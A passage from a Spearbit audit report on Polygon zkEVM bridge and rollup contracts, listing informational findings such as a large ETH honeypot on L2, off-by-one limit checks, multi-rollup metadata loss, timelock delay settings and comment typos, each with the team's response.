Polygon-Hermez: Solved in PR 85. Note: bridgeAsset() is still public since it's used in one of the mocks, and changing it to external has no effect on bytecode length or gas cost.

Spearbit: Verified.

+5.4.6 Common interface for PolygonZkEVMGlobalExitRoot and PolygonZkEVMGlobalExitRootL2

Severity: Informational

Context: PolygonZkEVMGlobalExitRoot.sol#L5, PolygonZkEVMGlobalExitRootL2.sol#L11

Description: The contract PolygonZkEVMGlobalExitRoot inherits from IPolygonZkEVMGlobalExitRoot, while PolygonZkEVMGlobalExitRootL2 doesn't, although they both implement a similar interface. Inheriting from the same interface file would improve the checks done by the compiler. Note: PolygonZkEVMGlobalExitRoot implements an extra function getLastGlobalExitRoot().

    import "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";

    contract PolygonZkEVMGlobalExitRoot is IPolygonZkEVMGlobalExitRoot, ... {
        ...
    }

    contract PolygonZkEVMGlobalExitRootL2 {
    }

Recommendation: Consider having a common interface file and an additional interface for the extra function in PolygonZkEVMGlobalExitRoot.

Polygon-Hermez: Solved in PR 88.

Spearbit: Verified.

+5.4.7 Abstract the way to calculate GlobalExitRoot

Severity: Informational

Context: PolygonZkEVMGlobalExitRoot.sol#L54-L85, PolygonZkEVMBridge.sol#L520-L581

Description: The algorithm to combine the mainnetExitRoot and rollupExitRoot is implemented in several locations in the code. This could be abstracted in contract PolygonZkEVMBridge, especially because it will be enhanced when more L2s are added.

    contract PolygonZkEVMGlobalExitRoot is ... {
        function updateExitRoot(bytes32 newRoot) external {
            ...
            bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)); // first
            ...
        }

        function getLastGlobalExitRoot() public view returns (bytes32) {
            return keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)); // second
        }
    }

    contract PolygonZkEVMBridge is ... {
        function _verifyLeaf(..., bytes32 mainnetExitRoot, bytes32 rollupExitRoot, ...) ... {
            ...
            uint256 timestampGlobalExitRoot = globalExitRootManager
                .globalExitRootMap(
                    keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot))
                ); // third
            ...
        }
    }

Recommendation: Consider using functions like the functions below:

    function calculateGlobalExitRoot(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) {
        return keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot));
    }

The following function is useful to prevent having to call globalExitRootManager twice from PolygonZkEVMBridge.

    function globalExitRootMapCalculated(bytes32 mainnetExitRoot, bytes32 rollupExitRoot) public view returns (bytes32) {
        return globalExitRootMap[calculateGlobalExitRoot(mainnetExitRoot, rollupExitRoot)];
    }

Polygon-Hermez: We created a library to abstract this calculation: GlobalExitRootLib.sol. We didn't put it in PolygonZkEVMGlobalExitRoot, since then it would also have to be put in PolygonZkEVMGlobalExitRootL2, and that contract should be as simple as possible and shouldn't have to be updated when adding new networks. Solved in PR 88.

Spearbit: Verified.

+5.4.8 ETH honeypot on L2

Severity: Informational

Context: genesis-gen.json#L9

Description: The initial ETH allocation to the Bridge contract on L2 is rather large: 2E8 ETH on the test network and 1E11 ETH on the production network, according to the documentation. This would make the bridge a large honeypot, even more than other bridges. If someone were able to retrieve the ETH, they could exchange it for all other available coins on the L2, bridge them back to mainnet, and thus steal about all TVL on the L2.

Recommendation: A possible solution could be:

• Have a cold wallet contract on L2 that contains the bulk of the ETH.
• Have a function that can only transfer ETH to the bridge contract (the bridge contract must be able to receive this).
• A governance action could trigger the ETH transfer to the bridge, making sure there is a sufficiently large amount for any imaginable bridge action.
• Alternatively, this action could be permissionless, but that would require implementing time and amount limits, which would complicate the contract.

Polygon-Hermez: An alternative to pre-minting could be to have a function to mint ETH, which we decided not to implement because it is too risky. If the bridge were taken over, then there are several other ways to steal the TVL. Any solution would complicate the logic and introduce more risk, especially if human interaction is involved.

Spearbit: Acknowledged.

+5.4.9 Allowance is not required to burn wrapped tokens

Severity: Informational

Context: TokenWrapped.sol#L62-L64

Description: Burning tokens of the deployed TokenWrapped doesn't use up any allowance, because the Bridge has the right to burn the wrapped token. Normally a user would approve a certain amount of tokens and then do an action (e.g. bridgeAsset()). This could be seen as an extra safety precaution. So you lose that extra safety this way, and it might be unexpected from the user's point of view. However, it's also very convenient for doing a one-step bridge (comparable to using permit). Note: most other bridges also do it this way.

    function burn(address account, uint256 value) external onlyBridge {
        _burn(account, value);
    }

Recommendation: Document the behavior so users are aware an allowance is not required.

Polygon-Hermez: Will be added to the documentation, and a comment is added in PR 88.

Spearbit: Verified.
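To make the difference discussed in 5.4.9 concrete, here is a minimal standalone sketch (hypothetical, not the project's code; it assumes an OpenZeppelin ERC20 of version 4.6 or later, which provides _spendAllowance) contrasting the bridge-privileged burn with the conventional allowance-based burnFrom:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

    contract WrappedTokenSketch is ERC20 {
        address public immutable bridgeAddress;

        constructor(address _bridgeAddress) ERC20("Wrapped Sketch", "WSK") {
            bridgeAddress = _bridgeAddress;
        }

        // Style discussed above: the bridge may burn any holder's tokens
        // directly, so bridging is a single transaction and no allowance
        // is consumed.
        function burn(address account, uint256 value) external {
            require(msg.sender == bridgeAddress, "only bridge");
            _burn(account, value);
        }

        // Conventional two-step alternative: the holder first approves the
        // spender, and the burn then consumes that allowance.
        function burnFrom(address account, uint256 value) external {
            _spendAllowance(account, msg.sender, value);
            _burn(account, value);
        }
    }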
+5.4.10 Messages are lost when delivered to EOA by claimMessage()

Severity: Informational

Context: PolygonZkEVMBridge.sol#L388-L436

Description: The function claimMessage() calls the function onMessageReceived() via a low-level call. When the receiving address doesn't contain a contract, the low-level call still succeeds and delivers the ETH. The documentation says: "... IBridgeMessageReceiver interface and such interface must be fulfilled by the receiver contract, it will ensure that the receiver contract has implemented the logic to handle the message." As we understood from the project, this behavior is intentional. It can be useful to deliver ETH to externally owned accounts (EOAs); however, the message (which is the main goal of the function) isn't interpreted and is thus lost, without any notification. The loss of message delivery to EOAs (i.e. non-contracts) might not be obvious to casual readers of the code/documentation.

    function claimMessage(...) ... {
        ...
        (bool success, ) = destinationAddress.call{value: amount}(
            abi.encodeCall(
                IBridgeMessageReceiver.onMessageReceived,
                (originAddress, originNetwork, metadata)
            )
        );
        require(success, "PolygonZkEVMBridge::claimMessage: Message failed");
        ...
    }

Recommendation: Double-check this behavior is as intended. Add comments about EOAs in the code and clarify them in the documentation.

Polygon-Hermez: Solved in PR 88.

Spearbit: Verified.

+5.4.11 Replace assembly of _getSelector() with Solidity

Severity: Informational

Context: PolygonZkEVMBridge.sol#L611-L736

Description: The function _getSelector() gets the first four bytes of a series of bytes and uses assembly. This can also be implemented in Solidity, which is easier to read.

    function _getSelector(bytes memory _data) private pure returns (bytes4 sig) {
        assembly {
            sig := mload(add(_data, 32))
        }
    }

    function _permit(..., bytes calldata permitData) ... {
        bytes4 sig = _getSelector(permitData);
        ...
    }

Recommendation: Consider using the following way to retrieve the first four bytes, and remove function _getSelector().

    function _permit(..., bytes calldata permitData) ... {
-       bytes4 sig = _getSelector(permitData);
+       bytes4 sig = bytes4(permitData[:4]);

Polygon-Hermez: Solved in PR 82.

Spearbit: Verified.

+5.4.12 Improvement suggestions for Verifier.sol

Severity: Informational

Context: Verifier.sol#L14, IVerifierRollup.sol

Description: Verifier.sol is a contract automatically generated by snarkjs and is based on the template verifier_groth16.sol.ejs. There are some details that can be improved in this contract. However, changing it will require doing PRs for the snarkjs project.

Recommendation: We have the following improvement suggestions:

• Change to Solidity version 0.8.x, because version 0.6.11 is older and misses overflow/underflow checks. Also, the rest of the PolygonZkEVM uses version 0.8.x. This will also allow using custom errors.
• Use uint256 instead of uint, because then it is immediately clear how large the uints are.
• Double-check sub(gas(), 2000) in the staticcall()s, as it might not be necessary anymore after the Tangerine Whistle fork, because only 63/64 of the gas is sent.
• Generate an explicit interface file like IVerifierRollup.sol and let Verifier.sol inherit it to make sure they are compatible.
We also have these suggestions for gas optimizations:

• uint q in function negate() could be a constant;
• uint256 snark_scalar_field in function verify() could be a constant;
• remove switch success case 0 { invalid() }, as it is redundant with the require() after it;
• in function pairing(), store the i*6 in a tmp variable;
• in function verifyProof(), use return (verify(inputValues, proof) == 0);.

Polygon-Hermez: These are great suggestions, but it requires some time to analyze whether these optimizations are completely safe, so we will postpone adding them to future versions.

Spearbit: Acknowledged.

+5.4.13 Variable named incorrectly

Severity: Informational

Context: PolygonZkEVM.sol#L854

Description: It seems the variable veryBatchTimeTarget was meant to be named verifyBatchTimeTarget, as evidenced by the comment below:

    // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET

Recommendation: Rename the variable veryBatchTimeTarget to verifyBatchTimeTarget. Also, rename the event SetVeryBatchTimeTarget to SetVerifyBatchTimeTarget. If the variable is named correctly, then update the comment to:

    // Check if timestamp is above or below the veryBatchTimeTarget

Polygon-Hermez: Solved in PR 88.

Spearbit: Verified.

+5.4.14 Add additional comments to function forceBatch()

Severity: Informational

Context: PolygonZkEVM.sol#L920-L966

Description: The function forceBatch() contains a comment about synch attacks. It's not immediately clear what is meant by that. The team explained the following:

• Getting the call data from an EOA is easy/cheap, so there is no need to put the transactions in the event (which is expensive).
• Getting the internal call data from internal transactions (which is done via a smart contract) is complicated (because it requires an archival node), and then it's worth it to put the transactions in the event, which is easy to query.

    function forceBatch(...) ... {
        ...
        // In order to avoid synch attacks, if the msg.sender is not the origin
        // Add the transaction bytes in the event
        if (msg.sender == tx.origin) {
            emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, "");
        } else {
            emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, transactions);
        }
    }

Recommendation: Add additional comments to the function forceBatch() to explain the approach taken.

Polygon-Hermez: Solved in PR 88.

Spearbit: Verified.

+5.4.15 Check against MAX_VERIFY_BATCHES

Severity: Informational

Context: PolygonZkEVM.sol#L409-L533, PolygonZkEVM.sol#L545-L611, PolygonZkEVM.sol#L972-L1054

Description: In several functions a comparison is made with < MAX_VERIFY_BATCHES. This should probably be <= MAX_VERIFY_BATCHES; otherwise, the MAX will never be reached.

    uint64 public constant MAX_VERIFY_BATCHES = 1000;

    function sequenceForceBatches(ForcedBatchData[] memory batches) ... {
        uint256 batchesNum = batches.length;
        ...
        require(batchesNum < MAX_VERIFY_BATCHES, ...);
        ...
    }

    function sequenceBatches(BatchData[] memory batches) ... {
        uint256 batchesNum = batches.length;
        ...
        require(batchesNum < MAX_VERIFY_BATCHES, ...);
        ...
    }

    function verifyBatches(...) ... {
        ...
        require(finalNewBatch - initNumBatch < MAX_VERIFY_BATCHES, ...);
        ...
    }

Recommendation: Double-check the conclusion and consider applying these changes:

- require( ... < MAX_VERIFY_BATCHES, ... );
+ require( ... <= MAX_VERIFY_BATCHES, ... );

Polygon-Hermez: Solved in PR 88.

Spearbit: Verified.
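The boundary difference in 5.4.15 is easy to see in isolation. The following tiny standalone sketch (hypothetical, not the audited code) shows that with the strict comparison, a sequence of exactly MAX_VERIFY_BATCHES batches is rejected, so the stated maximum can never actually be used:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract BoundarySketch {
        uint64 public constant MAX_VERIFY_BATCHES = 1000;

        // Strict check: returns false for batchesNum == 1000,
        // so the documented maximum is unreachable.
        function allowedStrict(uint256 batchesNum) external pure returns (bool) {
            return batchesNum < MAX_VERIFY_BATCHES;
        }

        // Inclusive check: returns true for batchesNum == 1000,
        // matching the intent of a maximum of 1000 batches.
        function allowedInclusive(uint256 batchesNum) external pure returns (bool) {
            return batchesNum <= MAX_VERIFY_BATCHES;
        }
    }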
+5.4.16 Prepare for multiple aggregators/sequencers to improve availability

Severity: Informational

Context: PolygonZkEVM.sol#L377-L391

Description: As long as there is one (trusted) sequencer and one (trusted) aggregator, the availability risks are relatively high. However, the current code isn't optimized to support multiple trusted sequencers and multiple trusted aggregators.

    modifier onlyTrustedSequencer() {
        require(trustedSequencer == msg.sender, ...);
        _;
    }

    modifier onlyTrustedAggregator() {
        require(trustedAggregator == msg.sender, ...);
        _;
    }

Recommendation: It might be useful to make small changes in the code to support multiple trusted sequencers and multiple trusted aggregators to improve availability.

Polygon-Hermez: Since the trustedSequencer/trustedAggregator address can be changed, if we want to support multiple trusted actors and/or add a consensus layer to coordinate them, this will be delegated in the future to another smart contract.

Spearbit: Acknowledged.

+5.4.17 Temporary Fund freeze on using Multiple Rollups

Severity: Informational

Context: PolygonZkEVMBridge.sol#L157-L165

Description: Claiming of assets will freeze temporarily if multiple rollups are involved, as shown below. The asset will be temporarily lost if the transfer chain is: a. Mainnet -> R1 -> R2, or b. R1 -> R2 -> Mainnet.

1. USDC is bridged from Mainnet to rollup R1 with its metadata.
2. The user claims this and a new wrapped token is prepared using the USDC token and its metadata.

    bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress));
    TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals);

3. Let's say the user bridges this token to rollup R2. This will burn the wrapped token on R1:

    if (tokenInfo.originTokenAddress != address(0)) {
        // The token is a wrapped token from another network
        // Burn tokens
        TokenWrapped(token).burn(msg.sender, amount);
        originTokenAddress = tokenInfo.originTokenAddress;
        originNetwork = tokenInfo.originNetwork;
    }

4. The problem is that the metadata was not set while bridging here.
5. So once the user claims this on R2, wrapped token creation will fail, since abi.decode on empty metadata will fail to retrieve name, symbol, etc. The asset will be temporarily lost, since it was bridged properly but cannot be claimed.

Showing the transaction chain:

Mainnet

bridgeAsset(usdc, R1, 0xUser1, 100, "")
• Transfer 100 USDC to Mainnet M1
• originTokenAddress = USDC
• originNetwork = Mainnet
• metadata = (USDC, USDC, 6)
• Deposit node created

R1

claimAsset(..., Mainnet, USDC, R1, 0xUser1, 100, metadata = (USDC, USDC, 6))
• Claim verified
• Marked claimed
• tokenInfoHash derived from originNetwork, originTokenAddress, which is Mainnet, USDC
• tokenInfoToWrappedToken[Mainnet, USDC] created using metadata = (USDC, USDC, 6)
• User minted 100 amount of tokenInfoToWrappedToken[Mainnet, USDC]

bridgeAsset(tokenInfoToWrappedToken[Mainnet, USDC], R2, 0xUser2, 100, "")
• Burn 100 tokenInfoToWrappedToken[Mainnet, USDC]
• originTokenAddress = USDC
• originNetwork = Mainnet
• metadata = ""
• Deposit node created with empty metadata

R2

claimAsset(..., Mainnet, USDC, R2, 0xUser2, 100, metadata = "")
• Claim verified
• Marked claimed
• tokenInfoHash derived from originNetwork, originTokenAddress, which is Mainnet, USDC
• Since metadata = "", the abi decode fails

Recommendation: Since the current system does not have multiple rollups, this issue is marked informational.
But in the future, when multiple rollups are in place, this code needs to be upgraded to also retrieve the metadata during the burn while bridging, which will ensure the recipient rollup can correctly decode the metadata.

Polygon-Hermez: We will take this into account if we upgrade the system to support multiple rollups.

Spearbit: Acknowledged.

+5.4.18 Off by one error when comparing with MAX_TRANSACTIONS_BYTE_LENGTH constant

Severity: Informational

Context: PolygonZkEVM.sol#L933, PolygonZkEVM.sol#L471

Description: When comparing against MAX_TRANSACTIONS_BYTE_LENGTH, the valid range should be <= instead of <.

    require(
        transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH,
        "PolygonZkEVM::forceBatch: Transactions bytes overflow"
    );

    require(
        currentBatch.transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH,
        "PolygonZkEVM::sequenceBatches: Transactions bytes overflow"
    );

Recommendation: Consider using <= instead of <.

Polygon-Hermez: Solved in PR 88.

Spearbit: Verified.

+5.4.19 trustedAggregatorTimeout value may impact batchFees

Severity: Informational

Context: PolygonZkEVM.sol#L855-L858, PolygonZkEVM.sol#L557-L562

Description: If trustedAggregatorTimeout and veryBatchTimeTarget have values close to each other, then all batches verified by a 3rd party will be above target (totalBatchesAboveTarget), and this would impact batch fees.

1. Let's say veryBatchTimeTarget is 30 min and trustedAggregatorTimeout is 31 min.
2. Now anyone can call verifyBatches only after 31 min, due to the condition below:

    require(
        sequencedBatches[finalNewBatch].sequencedTimestamp + trustedAggregatorTimeout <= block.timestamp,
        "PolygonZkEVM::verifyBatches: Trusted aggregator timeout not expired"
    );

3. This means _updateBatchFee can at minimum be called after 31 min of sequencing by a non-trusted aggregator.
4. The condition below then always returns true:

    if (
        block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget // 31 > 30
    ) {

Recommendation: As mentioned by the product team, the trustedAggregatorTimeout value is only meant to be high at initialization and emergency time, during which 3rd-party aggregation should not happen, thus preventing the issue.

+5.4.20 Largest allowed batch fee multiplier is 1023 instead of 1024

Severity: Informational

Context: PolygonZkEVM.sol#L1155, PolygonZkEVM.sol#L133

Description: Per the setMultiplierBatchFee function, the largest allowed batch fee multiplier is 1023.

    /**
     * @notice Allow the admin to set a new multiplier batch fee
     * @param newMultiplierBatchFee multiplier bathc fee
     */
    function setMultiplierBatchFee(
        uint16 newMultiplierBatchFee
    ) public onlyAdmin {
        require(
            newMultiplierBatchFee >= 1000 && newMultiplierBatchFee < 1024,
            "PolygonZkEVM::setMultiplierBatchFee: newMultiplierBatchFee incorrect range"
        );
        multiplierBatchFee = newMultiplierBatchFee;
        emit SetMultiplierBatchFee(newMultiplierBatchFee);
    }

However, the comment mentions that the largest allowed is 1024.

    // Batch fee multiplier with 3 decimals that goes from 1000 - 1024
    uint16 public multiplierBatchFee;

Recommendation: The implementation should be consistent with the comment and vice versa.
Note that apart from initialization and emergency periods, trustedAggregatorTimeout is meant to move towards a 0 value (see 5.4.19 above). Hence it could be documented as a reference for the admin, who should always take care to set the value lower than veryBatchTimeTarget during normal scenarios.

Polygon-Hermez: A comment was added in PR 88.

Spearbit: Verified.

Therefore, for 5.4.20, consider updating the implementation to allow the largest batch fee multiplier to be 1024, or update the comment accordingly.

Polygon-Hermez: The comment is updated in PR 87.

Spearbit: Verified.

+5.4.21 Deposit token associated Risk Awareness

Severity: Informational

Context: PolygonZkEVMBridge.sol#L129

Description: The deposited tokens locked on L1 could be at risk due to external conditions like the one shown below:

1. Assume there is a huge amount of token X being bridged to a rollup.
2. Now mainnet will have a huge balance of token X.
3. Unfortunately, due to a hack or a LUNA-like condition, the project owner takes a snapshot of the current token X balance for each user address, and later all these addresses will be airdropped a new token based on the snapshot value.
4. In this case, token X on mainnet will be snapshotted, but at disbursal time the newly updated token will be airdropped to mainnet and not to the user.
5. Now there is no emergency-withdraw method to get these airdropped funds out.
6. For the users, if they claim funds they still get token X, which is worthless.

Recommendation: Update the documentation to make users aware of such edge cases and the possible actions to be taken.

Polygon-Hermez: This is not a scenario that affects only our zkEVM, but a scenario that affects all contracts (DeFi, bridges, etc.). Users usually notice these kinds of situations; that's why they will usually move their funds back to their mainnet address. For those who don't know about the situation, projects that make these kinds of airdrops usually warn users about the conditions. Nevertheless, the project could even airdrop the corresponding funds on L2, but this will always be the responsibility of the project.

Spearbit: Acknowledged.

+5.4.22 Fees might get stuck when Aggregator is unable to verify

Severity: Informational

Context: PolygonZkEVM.sol#L523

Description: The fees collected from the sequencer will be stuck in the contract if the aggregator is unable to verify the batch. In this case, the aggregator will not be paid and the batch transaction fee will get stuck in the contract.

Recommendation: In the future, if these collected fees become significant, a temporary contract upgrade may be required to allow transferring these funds.

Polygon-Hermez: This is intended; the fees must be stuck in the contract until an aggregator verifies batches. Otherwise, if the fees could be retrieved from the contract, the aggregator reward could be stolen. It makes sense that aggregators do not receive rewards if the network is stopped. In case an aggregator is unable to verify a batch, the whole system will be blocked. The aggregator fees might be a problem, but a very small one compared with a whole network that is stopped (or at least whose withdrawals are stopped); technically all the bridge funds would be blocked, which is a bigger problem, and for sure we would need an upgrade if this happens. In summary, the point is that we are doing everything to avoid this situation, but if it happens, an upgrade will be necessary anyway; we don't think it's worth putting any additional mechanism in place in this regard.

Spearbit: Acknowledged.

+5.4.23 Consider using OpenZeppelin's ECDSA library over ecrecover

Severity: Informational

Context: TokenWrapped.sol#L100

Description: As stated here, ecrecover is vulnerable to a signature malleability attack.
While the code in permit is not vulnerable, since a nonce is used in the signed data, we would still recommend using OpenZeppelin's ECDSA library, as it does the malleability safety check for you, as well as the signer != address(0) check done on the next line.

Recommendation: Replace the ecrecover call with an ECDSA.recover() call.

Polygon-Hermez: We prefer to use this approach since it does not perform additional checks, is more gas efficient and simpler, and is used by very common projects like UNI.

Spearbit: Acknowledged.

+5.4.24 Risk of transactions not yet in Consolidated state on L2

Severity: Informational

Context: PolygonZkEVMBridge.sol#L540-L548

Description: There is a relatively long period during which batches, and thus transactions, are between the Trusted state and the Consolidated state: normally around 30 minutes, but in exceptional situations up to 2 weeks. On the L2, users normally interact with the Trusted state. However, they should be aware of the risk for high-value transactions (especially for transactions that can't be undone, like transactions that have an effect outside of the L2, such as off-ramps, OTC transactions, alternative bridges, etc.). There will be custom RPC endpoints that can be used to retrieve status information, see zkevm.go.

Recommendation: Make sure to document the risk of transactions that are not consolidated yet on L2.

Polygon-Hermez: We will add a comment regarding this in the documentation. We also want to add this information to the block explorer, similar to how Optimism is doing it: optimistic.etherscan. In the blockNumber field, put extra information like: confirmed by sequencer, virtual state, consolidated state.

Spearbit: Acknowledged.

+5.4.25 Delay of bridging from L2 to L1

Severity: Informational

Context: PolygonZkEVMBridge.sol#L540-L548

Description: The bridge uses the Consolidated state while bridging from L2 to L1, and the user interface, public.zkevm-test.net, shows "Waiting for validity proof. It can take between 15 min and 1 hour.". Other (optimistic) bridges use liquidity providers who take the risk and allow users to retrieve funds in a shorter amount of time (for a fee).

Recommendation: Consider implementing a mechanism to reduce the time to bridge from L2 to L1.

Polygon-Hermez: We do not plan to implement such a mechanism. We consider the 15 min - 1 hour an acceptable delay, since it's a typical timing in most CEXs, so users are already used to this timing for being able to withdraw funds. In case it becomes a must for the users, we expect that other projects can deploy on top of our system and provide such solutions with some incentive mechanisms, using the messages between layers.

Spearbit: Acknowledged.

+5.4.26 Missing Natspec documentation

Severity: Informational

Context: PolygonZkEVM.sol#L672, PolygonZkEVM.sol#L98

Description: Some NatSpec comments are either missing or incomplete.
• Missing NatSpec comment for pendingStateNum:

    /**
     * @notice Verify batches internal function
     * @param initNumBatch Batch which the aggregator starts the verification
     * @param finalNewBatch Last batch aggregator intends to verify
     * @param newLocalExitRoot New local exit root once the batch is processed
     * @param newStateRoot New State root once the batch is processed
     * @param proofA zk-snark input
     * @param proofB zk-snark input
     * @param proofC zk-snark input
     */
    function _verifyBatches(
        uint64 pendingStateNum,
        uint64 initNumBatch,
        uint64 finalNewBatch,
        bytes32 newLocalExitRoot,
        bytes32 newStateRoot,
        uint256[2] calldata proofA,
        uint256[2][2] calldata proofB,
        uint256[2] calldata proofC
    ) internal {

• Missing NatSpec comment for pendingStateTimeout:

    /**
     * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed
     * and avoid stack too deep errors.
     * @param admin Admin address
     * @param chainID L2 chainID
     * @param trustedSequencer Trusted sequencer address
     * @param forceBatchAllowed Indicates wheather the force batch functionality is available
     * @param trustedAggregator Trusted aggregator
     * @param trustedAggregatorTimeout Trusted aggregator timeout
     */
    struct InitializePackedParameters {
        address admin;
        uint64 chainID;
        address trustedSequencer;
        uint64 pendingStateTimeout;
        bool forceBatchAllowed;
        address trustedAggregator;
        uint64 trustedAggregatorTimeout;
    }

Recommendation: Add or complete the missing NatSpec comments.

Polygon-Hermez: Solved in PR 87.

Spearbit: Verified.

+5.4.27 _minDelay could be 0 without emergency

Severity: Informational

Context: PolygonZkEVMTimelock.sol#L40-L46

Description: Normally the min delay is only supposed to be 0 when in an emergency state. But it could be made 0 even in non-emergency mode, as shown below:

1. A proposer can propose an operation for changing _minDelay to 0 via the updateDelay function.
2. Now, if this operation is executed by the executor, _minDelay will be 0 even without an emergency state.

Recommendation: Override the updateDelay function and impose a minimum timelock delay preventing a 0 delay, OR update the docs to make users aware of such scenario(s) so that they can make a decision if such a proposal ever arrives.

Polygon-Hermez: Being able to update the delay to 0 is the standard in most Timelock implementations, including the one followed by OpenZeppelin; we don't see a reason to change its default behavior. Since this is the default behavior, users are already aware of this scenario.

Spearbit: Acknowledged.

+5.4.28 Incorrect/incomplete comment

Severity: Informational

Context: Mentioned in Recommendation

Description: There are a few mistakes in the comments that can be corrected in the codebase.

Recommendation:

• PolygonZkEVM.sol#L1106: This function is used for configuring the pending state timeout.

- * @notice Allow the admin to set a new trusted aggregator timeout
+ * @notice Allow the admin to set a new pending state timeout

• PolygonZkEVMBridge.sol#L217: The function also sends ETH; it would be good to add that to the NatSpec.

- * @notice Bridge message
+ * @notice Bridge message and send ETH value

• PolygonZkEVMBridge.sol#L69: A developer assumption is not documented.

+ * @notice The value of `_polygonZkEVMaddress` on the L2 deployment of the contract will be `address(0)`, so
+ * emergency state is not possible for the L2 deployment of the bridge, intentionally

• PolygonZkEVM.sol#L141: The comment is not synchronized with the ForcedBatchData struct.
It should be minForcedTimestamp instead of minTimestamp for the last parameter.

  // hashedForcedBatchData: hash containing the necessary information to force a batch:
- // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minTimestamp)
+ // keccak256(keccak256(bytes transactions), bytes32 globalExitRoot, unint64 minForcedTimestamp)

• PolygonZkEVM.sol#L522: Comment is incorrect; the sequencer actually pays collateral for every non-forced batch submitted, not for every batch submitted.

- // Pay collateral for every batch submitted
+ // Pay collateral for every non-forced batch submitted

• PolygonZkEVM.sol#L864: Comment is incorrect; the actual variable updated is currentBatch, not currentLastVerifiedBatch.

- // update currentLastVerifiedBatch
+ // update currentBatch

• PolygonZkEVM.sol#L1193: Comment seems to be copy-pasted from another method, proveNonDeterministicPendingState. Remove it or write a comment for the current function.

- * @notice Allows to halt the PolygonZkEVM if its possible to prove a different state root given the same batches

Polygon-Hermez: Solved in PR 87.

Spearbit: Verified.

+5.4.29 Typos, grammatical and styling errors

Severity: Informational

Context: Mentioned in Recommendation

Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Some functions could also be renamed to better reflect their purposes.

Recommendation:

• PolygonZkEVM.sol#L671: The function _verifyBatches() does more than verifying batches. It also transfers matic. Therefore, it is recommended to change the function name and comment.

- function _verifyBatches(
+ function _verifyAndRewardBatches(
      uint64 pendingStateNum,
      uint64 initNumBatch,

• PolygonZkEVMBridge.sol#L37: Typo. Should be identifier instead of indentifier.

- // Mainnet indentifier
+ // Mainnet identifier

• TokenWrapped.sol#L53: Typo. Should be immutable instead of inmutable.

- // initialize inmutable variables
+ // initialize immutable variables

• PolygonZkEVM.sol#L407, PolygonZkEVM.sol#L970: Typo and grammatical error. Should be batches to instead of batces ot, and should be Struct array which holds the necessary data instead of Struct array which the necessary data.

- * @param batches Struct array which the necessary data to append new batces ot the sequence
+ * @param batches Struct array which holds the necessary data to append new batches to the sequence

• PolygonZkEVM.sol#L1502: Typo. Should be the instead of teh.

- * @param initNumBatch Batch which the aggregator starts teh verification
+ * @param initNumBatch Batch which the aggregator starts the verification

• PolygonZkEVM.sol#L1396: Typo. Should be contracts instead of contrats.

- * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contrats
+ * @notice Function to activate emergency state, which also enable the emergency mode on both PolygonZkEVM and PolygonZkEVMBridge contracts

• PolygonZkEVM.sol#L1430: Typo. Should be contracts instead of contrats.

- * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats
+ * @notice Function to deactivate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts

• PolygonZkEVM.sol#L144: Typo.
Should be contracts instead of contrats.

- * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contrats
+ * @notice Internal function to activate emergency state on both PolygonZkEVM and PolygonZkEVMBridge contracts

• PolygonZkEVM.sol#L1108: Typo. Should be aggregator instead of aggreagator.

- * @param newTrustedAggregatorTimeout Trusted aggreagator timeout
+ * @param newTrustedAggregatorTimeout Trusted aggregator timeout

• PolygonZkEVM.sol#L969: Grammatical error. Should be has not done so in the timeout period instead of do not have done it in the timeout period.

- * @notice Allows anyone to sequence forced Batches if the trusted sequencer do not have done it in the timeout period
+ * @notice Allows anyone to sequence forced Batches if the trusted sequencer has not done so in the timeout period

• PolygonZkEVM.sol#L1291: Typo. Should be function instead of functoin.

- * @notice Internal functoin that prove a different state root given the same batches to verify
+ * @notice Internal function that prove a different state root given the same batches to verify

• PolygonZkEVM.sol#L1062: Typo. Should be sequencer instead of sequuencer.

- * @param newTrustedSequencer Address of the new trusted sequuencer
+ * @param newTrustedSequencer Address of the new trusted sequencer

• PolygonZkEVM.sol#L1094: Legacy comment. Does not make sense with the current code.

- * If address 0 is set, everyone is free to aggregate

• PolygonZkEVM.sol#L1131: Typo. Should be aggregator instead of aggreagator.

- * @param newPendingStateTimeout Trusted aggreagator timeout
+ * @param newPendingStateTimeout Trusted aggregator timeout

• PolygonZkEVM.sol#L1153: Typo. Should be batch instead of bathc.

- * @param newMultiplierBatchFee multiplier bathc fee
+ * @param newMultiplierBatchFee multiplier batch fee

• PolygonZkEVM.sol#L1367: Grammatical error. Should be must be equal to instead of must be equal than.

- "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal than currentLastVerifiedBatch"
+ "PolygonZkEVM::_proveDistinctPendingState: finalNewBatch must be equal to currentLastVerifiedBatch"

• PolygonZkEVM.sol#L332: Typo. Should be deep instead of depp.

- * @param initializePackedParameters Struct to save gas and avoid stack too depp errors
+ * @param initializePackedParameters Struct to save gas and avoid stack too deep errors

• PolygonZkEVM.sol#L85: Typo. Should be because instead of becasue.

- * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed
+ * @notice Struct to call initialize, this basically saves gas because pack the parameters that can be packed

• PolygonZkEVM.sol#L59: Typo. Should be calculate instead of calcualte.

